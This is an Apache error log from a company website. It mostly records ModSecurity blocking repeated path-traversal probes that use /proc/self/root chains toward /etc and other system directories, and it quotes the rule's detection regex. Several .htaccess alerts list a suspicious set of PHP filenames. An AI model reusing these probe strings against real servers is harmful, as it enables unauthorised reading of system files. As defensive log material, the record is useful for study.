[Thu Mar 19 05:28:11.355289 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:36096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzmxkFeYa1D6dYQnDEEgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:12.687609 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:52720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuznPu8EFLIOrSqIpt0SAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:12.834258 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:56450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuznNa6ubjKNq_cu4YYPgAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:28:13.968654 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:52732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuznda6ubjKNq_cu4YYQAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:14.233834 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:45596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuznsdf6f5d65gmYZRIkwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:28:17.511479 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:52746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzofu8EFLIOrSqIpt0UQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:22.001998 2026] [mime_magic:error] [pid 17887:tid 140411590858496] (70014)End of file found: [client 57.141.18.91:53794] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:28:22.220032 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:52748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzpsdf6f5d65gmYZRIpAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:22.358288 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:45606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzpvu8EFLIOrSqIpt0VgAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:28:23.513516 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:50568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzpwkwaGbbGflqUZCL0QAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:36.422863 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:50578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzs-yqAr6etmhZHNo48wAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:37.919181 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:59612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuztfu8EFLIOrSqIpt0WAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:40.788286 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:34420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzuP-YZRR_7pZ7nDJi_gAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:28:58.005436 2026] [:error] [pid 15826:tid 140411691570944] [client 216.73.216.191:22658] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzyuoXxyEfFpUF8f_lwAAAAUY"]
[Thu Mar 19 05:29:19.581188 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:59622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuz38df6f5d65gmYZRI1wAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:29:21.955169 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:59380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuz4QkwaGbbGflqUZCL9wAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:29:24.616932 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:59396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuz5F_V7PWP6ixUYl6RCgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:29:26.073378 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.243.128:59396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuz5l_V7PWP6ixUYl6RDwAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:29:46.938695 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.241.31:47228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuz-l_V7PWP6ixUYl6RNwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:30:08.706246 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.241.31:50864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0EBkFeYa1D6dYQnDEXwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:30:16.797179 2026] [mime_magic:error] [pid 17653:tid 140411599251200] (70014)End of file found: [client 74.7.243.128:59406] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/spool/postfix
[Thu Mar 19 05:30:16.797401 2026] [access_compat:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:59406] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/spool/postfix
[Thu Mar 19 05:30:30.290125 2026] [core:alert] [pid 17653:tid 140411649607424] [client 57.141.18.114:57254] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 05:30:36.317834 2026] [core:alert] [pid 27293:tid 140411666392832] [client 74.7.241.31:47388] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware
[Thu Mar 19 05:30:47.995832 2026] [:error] [pid 27293:tid 140411548894976] [client 216.73.216.191:61256] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0N_-YZRR_7pZ7nDJjTQAAA9c"]
[Thu Mar 19 05:30:47.996200 2026] [mime_magic:error] [pid 27293:tid 140411649607424] (70014)End of file found: [client 57.141.18.57:57746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
